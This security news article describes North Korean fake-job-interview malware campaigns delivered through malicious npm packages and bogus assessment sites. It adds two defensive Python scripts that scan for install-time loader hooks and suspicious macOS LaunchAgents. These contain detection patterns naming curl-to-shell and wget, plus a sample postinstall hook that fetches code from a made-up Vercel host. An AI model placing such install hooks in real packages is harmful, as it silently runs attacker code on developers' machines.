N. Korea’s Contagious Interview Campaign Targets Job Seekers with 197 Malicious npm Packages
North Korea’s Contagious Interview malware campaign continues to escalate its pressure on the JavaScript-development ecosystem. Threat actors affiliated with DPRK hacking units are uploading malicious packages to the npm registry in bulk, disguising spyware distribution as legitimate tooling and as “test assignments” for supposed job interviews.
According to the security firm Socket, attackers have recently added another 197 malicious packages to npm, collectively downloaded more than 31,000 times. These components deliver a new variant of the OtterCookie malware, blending capabilities from earlier OtterCookie builds with features from the BeaverTail family. Among the identified loaders are bcryptjs-node, cross-sessions, json-oauth, node-tailwind, react-adparser, session-keeper, tailwind-magic, tailwindcss-forms, and webpack-loadcss.
Once executed, such a package checks whether it is running inside a sandbox or virtual machine, gathers system information, and establishes a command-and-control channel. Through this connection, operators gain remote access to the device, enabling them to intercept clipboard contents, log keystrokes, capture screenshots, and extract browser credentials, documents, cryptocurrency-wallet data, and seed phrases.
Cisco Talos researchers have previously observed the blurring of boundaries between OtterCookie and BeaverTail, citing an incident in Sri Lanka where a system was infected via a fake Node.js application tied to a fraudulent job interview. The current wave of npm packages is configured to connect to a hardcoded Vercel address, “tetrismic.vercel[.]app”, which leads to the download of a cross-platform OtterCookie binary hosted in a GitHub repository.
The delivery account, stardev0914, is no longer active, yet the campaign’s infrastructure continues to shift and evolve. Analysts, including Kirill Boychenko, note that the threat actors swiftly adapt their tooling to modern JavaScript projects and cryptocurrency-development environments.
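The traits described above (a loader name on Socket's list, an npm lifecycle script that runs at install time, and a hardcoded staging host such as a Vercel subdomain or a GitHub URL) can be checked for mechanically across an installed dependency tree. The script below is an added example for this page, not Socket's or any researcher's tooling; it assumes the package.json layout npm writes under node_modules, and the two sample manifests and the host "sample-loader.vercel.app" are constructed for the example (the campaign's real host is the defanged tetrismic.vercel[.]app quoted above).

```python
"""Triage npm package manifests for the install-time loader pattern.

Added example, not Socket's tooling.  For each package.json it flags:
  * a package name on the loader list quoted in the article,
  * lifecycle scripts npm runs automatically during `npm install`,
  * hardcoded *.vercel.app or GitHub hosts and inline/downloaded code
    execution inside those scripts.
"""
from __future__ import annotations

import json
import os
import re

KNOWN_LOADERS = {
    "bcryptjs-node", "cross-sessions", "json-oauth", "node-tailwind",
    "react-adparser", "session-keeper", "tailwind-magic", "tailwindcss-forms",
    "webpack-loadcss",
}
# Scripts npm runs on install, before any of the package's code is imported.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Free, disposable hosting commonly used to stage a dropper or payload.
STAGING_HOST_RE = re.compile(
    r"https?://((?:[a-z0-9-]+\.)+vercel\.app|raw\.githubusercontent\.com|github\.com)\b",
    re.I,
)
# `node -e "..."`, `curl ... | sh`, `wget`: code executed from a string or a download.
INLINE_EXEC_RE = re.compile(r"\bnode\s+-e\b|\bcurl\b.*\|\s*(?:sh|bash)\b|\bwget\b", re.I)


def triage_manifest(manifest: dict) -> list[str]:
    """Return human-readable findings for one parsed package.json (empty if clean)."""
    name = manifest.get("name", "<unnamed>")
    findings: list[str] = []
    if name in KNOWN_LOADERS:
        findings.append(f"{name}: name matches a loader reported by Socket")
    scripts = manifest.get("scripts") or {}
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        findings.append(f"{name}: {hook} hook runs at install time: {cmd!r}")
        for match in STAGING_HOST_RE.finditer(cmd):
            findings.append(f"{name}: {hook} fetches from hardcoded host {match.group(1)}")
        if INLINE_EXEC_RE.search(cmd):
            findings.append(f"{name}: {hook} executes inline or downloaded code")
    return findings


def scan_node_modules(root: str) -> dict[str, list[str]]:
    """Triage every package.json under a node_modules tree, nested packages included.

    Returns {path: findings} for packages that produced at least one finding.
    """
    report: dict[str, list[str]] = {}
    for dirpath, _dirs, files in os.walk(root):
        if "package.json" not in files:
            continue
        path = os.path.join(dirpath, "package.json")
        try:
            with open(path, encoding="utf-8") as fh:
                manifest = json.load(fh)
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest: skip, do not crash the scan
        findings = triage_manifest(manifest)
        if findings:
            report[path] = findings
    return report


# Constructed manifests: one benign, one shaped like the loaders described above.
SAMPLE_BENIGN = {"name": "left-pad-ish", "version": "1.0.0",
                 "scripts": {"test": "node test.js"}}
SAMPLE_LOADER = {
    "name": "tailwind-magic",
    "version": "2.1.4",
    "scripts": {
        # hypothetical hook; the host is made up for the example
        "postinstall": "node -e \"require('https').get('https://sample-loader.vercel.app/s',"
                       " r => r.pipe(process.stdout))\"",
    },
}

if __name__ == "__main__":
    for manifest in (SAMPLE_BENIGN, SAMPLE_LOADER):
        for line in triage_manifest(manifest) or [f"{manifest['name']}: no findings"]:
            print(line)
    # Real use: print(scan_node_modules("./node_modules"))
```

A lifecycle hook by itself is not proof of compromise (native modules legitimately build in `install`), so treat the hook finding as a prompt to read the script, and the host and inline-execution findings as the signal that warrants pulling the package for analysis. Running `npm install --ignore-scripts` while reviewing a "test assignment" repository prevents the hook from firing in the first place.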
In parallel, a related operation known as ClickFake Interview is expanding. This campaign involves fabricated evaluation websites that present “assessment tasks,” instructing applicants to “fix” a webcam or microphone using ClickFix-style guides. In reality, victims are coerced into downloading the GolangGhost malware (also known as FlexibleFerret or WeaselStore), written in Go.
The program connects to a hardcoded command-and-control server and loops on operator commands: it gathers system information, executes the instructions it receives, manipulates files, and extracts data from Google Chrome. Persistence on macOS is achieved through a LaunchAgent that executes a shell script whenever the user logs in.
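The LaunchAgent persistence described above leaves a concrete artifact: a plist under ~/Library/LaunchAgents (or /Library/LaunchAgents) whose RunAtLoad or KeepAlive key makes launchd start it at login and whose ProgramArguments invoke a shell interpreter or a script in a user-writable location. The script below is an added example, not the researchers' detection logic; the two plists are constructed for the example, and the "suspicious" verdict is a heuristic, not a definitive indicator.

```python
"""Flag LaunchAgents that start a shell script at login.

Added example, not from the Talos or Validin reports.  launchd starts an agent
at login when RunAtLoad is true (KeepAlive also keeps it running).  The
heuristic marks an agent as suspicious when it runs at login AND either
launches a shell/script interpreter or points at a user-writable path.
"""
from __future__ import annotations

import plistlib
from pathlib import Path

SHELL_INTERPRETERS = {"sh", "bash", "zsh", "osascript", "python3", "node"}
USER_WRITABLE_PREFIXES = ("/tmp/", "/private/tmp/", "/var/folders/", "/Users/")


def assess_launch_agent(plist_bytes: bytes) -> dict:
    """Parse one LaunchAgent plist (XML or binary) and return what it runs and why it was flagged."""
    plist = plistlib.loads(plist_bytes)
    args = list(plist.get("ProgramArguments") or [])
    if not args and "Program" in plist:
        args = [plist["Program"]]
    runs_at_login = bool(plist.get("RunAtLoad")) or bool(plist.get("KeepAlive"))
    interpreter = Path(args[0]).name if args else ""
    shell_launch = interpreter in SHELL_INTERPRETERS
    user_writable = any(a.startswith(USER_WRITABLE_PREFIXES) for a in args)
    return {
        "label": plist.get("Label", "<no label>"),
        "command": " ".join(args),
        "runs_at_login": runs_at_login,
        "shell_launch": shell_launch,
        "user_writable_path": user_writable,
        "suspicious": runs_at_login and (shell_launch or user_writable),
    }


def scan_launch_agents(dirs: list[Path] | None = None) -> list[dict]:
    """Assess every .plist in the standard per-user and system LaunchAgent directories."""
    if dirs is None:
        dirs = [Path.home() / "Library/LaunchAgents", Path("/Library/LaunchAgents")]
    results = []
    for directory in dirs:
        if not directory.is_dir():
            continue
        for path in sorted(directory.glob("*.plist")):
            try:
                result = assess_launch_agent(path.read_bytes())
            except Exception as exc:  # corrupt plist: worth a look, so flag rather than skip
                result = {"label": path.name, "error": str(exc), "suspicious": True}
            result["path"] = str(path)
            results.append(result)
    return results


# Constructed plists: the persistence shape described above, and a benign app helper.
SUSPICIOUS_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key><array>
    <string>/bin/sh</string>
    <string>/Users/alice/Library/Application Support/.update.sh</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>"""

BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.notes-sync</string>
  <key>ProgramArguments</key><array>
    <string>/Applications/Notes Sync.app/Contents/MacOS/helper</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict></plist>"""

if __name__ == "__main__":
    for sample in (SUSPICIOUS_PLIST, BENIGN_PLIST):
        print(assess_launch_agent(sample))
    for entry in scan_launch_agents():  # the live system, if run on macOS
        if entry["suspicious"]:
            print("REVIEW:", entry)
```

Expect false positives from legitimate agents that live under /Users (many developer tools install there); the value of the check is the short list it produces, which an analyst then confirms by reading the referenced script.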
The infection chain also employs a decoy application: it displays a fake Chrome-branded prompt requesting camera access, followed by a “Chrome-like” password dialog. The entered credentials are instantly exfiltrated to the attacker’s Dropbox account without arousing user suspicion.
Researchers at Validin emphasize that, unlike other DPRK operations focused on infiltrating legitimate companies under false identities, Contagious Interview and ClickFake Interview target job seekers themselves—compromising them through staged recruitment processes, fabricated assignments, and counterfeit hiring platforms.